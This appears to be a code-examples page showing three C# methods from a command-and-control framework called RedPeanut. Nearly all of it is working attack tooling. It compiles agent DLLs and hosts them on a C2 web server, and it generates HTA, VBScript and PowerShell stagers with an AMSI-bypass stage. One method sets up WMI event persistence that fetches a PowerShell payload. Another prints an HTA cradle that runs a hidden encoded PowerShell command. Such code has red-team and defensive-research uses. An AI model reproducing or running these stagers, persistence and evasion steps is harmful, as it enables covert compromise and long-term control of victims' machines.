Ejemplo n.º 1
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    if (lang == "vbs")
                    {
                        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                        {
                            //Building agent
                            ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                            string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                            string outfilename = RandomAString(10, new Random()) + ".dll";
                            Builder.GenerateDll(source, outfilename, 35);

                            //Add resource to webserver
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));

                            string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                            if (!uricontent.EndsWith("/"))
                            {
                                uricontent += "/";
                            }

                            string resourcepath = uricontent + outfilename;

                            //Build shooter assembly
                            source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                            source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);

                            string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);

                            HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null);

                            if (hosted)
                            {
                                //Add resource to webserver storage
                                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                Console.WriteLine("[*] Resource added to webserver resources");
                                Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                return;
                            }
                            else
                            {
                                //Write file to tmp env dir
                                File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            }
                        }
                    }
                    else
                    {
                        if (lang == "powershell")
                        {
                            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                            {
                                string         psfilename = RandomString(10, new Random()) + ".ps1";
                                ListenerConfig conf       = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                                string         source     = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                                string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll");

                                Dictionary <string, string> arg = new Dictionary <string, string>();
                                arg.Add("#{lhost}", lhost);
                                arg.Add("#{lport}", lport.ToString());

                                string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;

                                uricontent = uricontent.TrimStart('/');

                                if (!uricontent.EndsWith("/"))
                                {
                                    uricontent += "/";
                                }

                                arg.Add("#{uri}", uricontent + "s2_" + psfilename);

                                byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                                string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                                Dictionary <string, string> argagent = new Dictionary <string, string>();
                                argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                                PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                                PowershellAmsiGenerator   gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                                PowershellAgentGenerator  gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                                HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null);

                                if (hosted)
                                {
                                    //Add resource to webserver storage
                                    C2Manager c2manager = Program.GetC2Manager();

                                    c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                    c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename));
                                    c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename));
                                    Console.WriteLine("[*] Resource added to webserver resources");
                                    Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                    return;
                                }
                                else
                                {
                                    //Write file to tmp env dir
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText());

                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename));
                                }
                            }
                        }
                        else
                        {
                            Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
                            return;
                        }
                    }
                }
            }catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
Ejemplo n.º 2
0
        private void Run()
        {
            try
            {
                List <string> args = new List <string>();
                if (!string.IsNullOrEmpty(processname) && !string.IsNullOrEmpty(eventname))
                {
                    //Create webresource
                    //Register web resource

                    string         folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    string         filename    = RandomAString(10, new Random()).ToLower();
                    ListenerConfig conf        = new ListenerConfig("",
                                                                    ((AgentInstanceHttp)agent).GetAddress(),
                                                                    ((AgentInstanceHttp)agent).GetPort(),
                                                                    Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()),
                                                                    ((AgentInstanceHttp)agent).GetProfileid());

                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                    string assemblyBase64 = Builder.GenerateDllBase64(source, filename + ".dll");

                    byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                    string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                    Dictionary <string, string> argagent = new Dictionary <string, string>();
                    argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                    string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()).ContentUri;

                    uricontent = uricontent.TrimStart('/');

                    if (!uricontent.EndsWith("/"))
                    {
                        uricontent += "/";
                    }

                    Dictionary <string, string> arg = new Dictionary <string, string>
                    {
                        { "#{lhost}", ((AgentInstanceHttp)agent).GetAddress() },
                        { "#{lport}", ((AgentInstanceHttp)agent).GetPort().ToString() },
                        { "#{uri}", uricontent + "s2_" + filename + ".ps1" }
                    };

                    PowershellAmsiGenerator  gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                    PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                    //Add resource to webserver storage
                    C2Manager c2manager = Program.GetC2Manager();

                    c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(gen_s1, filename + ".ps1"));
                    c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(gen_s2, "s2_" + filename + ".ps1"));
                    Console.WriteLine("[*] Resource added to webserver resources");

                    string proto = "";

                    if (ssl)
                    {
                        proto = "https";
                    }
                    else
                    {
                        proto = "http";
                    }

                    string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), uricontent, filename + ".ps1");

                    string perssrc = File.ReadAllText(Path.Combine(folderrpath, PERSWMI_TEMPLATE));

                    perssrc = Replacer.ReplacePersWMI(perssrc, eventname, url, processname, encoded);

                    RunAssemblyBase64(
                        Convert.ToBase64String(
                            CompressGZipAssembly(
                                Builder.BuidStreamAssembly(perssrc, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.Persistence)
                                )
                            ),
                        "PersWMI",
                        new string[] { " " },
                        agent);

                    return;
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[x] Error generating task {0}", e.Message);
            }
        }
Ejemplo n.º 3
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, filename);

                        Dictionary <string, string> arg = new Dictionary <string, string>();
                        arg.Add("#{lhost}", lhost);
                        arg.Add("#{lport}", lport.ToString());

                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;

                        uricontent = uricontent.TrimStart('/');

                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }

                        arg.Add("#{uri}", uricontent + "s2_" + filename);

                        byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                        Dictionary <string, string> argagent = new Dictionary <string, string>();
                        argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                        PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                        PowershellAmsiGenerator   gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                        PowershellAgentGenerator  gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                        if (hosted)
                        {
                            //Add resource to webserver storage
                            C2Manager c2manager = Program.GetC2Manager();

                            c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen_s1, filename));
                            c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(gen_s2, "s2_" + filename));
                            Console.WriteLine("[*] Resource added to webserver resources");
                            Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                            Console.WriteLine("[*]");
                            Console.WriteLine("[*] Cradle example");
                            Console.WriteLine("[*]");
                            Console.WriteLine("<script language = \"VBScript\">");
                            Console.WriteLine("    Function etaget()");
                            Console.WriteLine("");
                            Console.WriteLine("        Dim ahsten");
                            Console.WriteLine("        Set ahsten = CreateObject(\"Wscript.Shell\")");
                            Console.WriteLine("        ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", gen_s0.GetScriptText());
                            Console.WriteLine("    End Function");
                            Console.WriteLine("");
                            Console.WriteLine("    etaget");
                            Console.WriteLine("    self.close");
                            Console.WriteLine("</script>");
                            Console.WriteLine("[*]");
                            return;
                        }
                        else
                        {
                            //Write file to tmp env dir
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen_s1.GetScriptText());
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + filename), gen_s2.GetScriptText());

                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + filename));
                        }
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }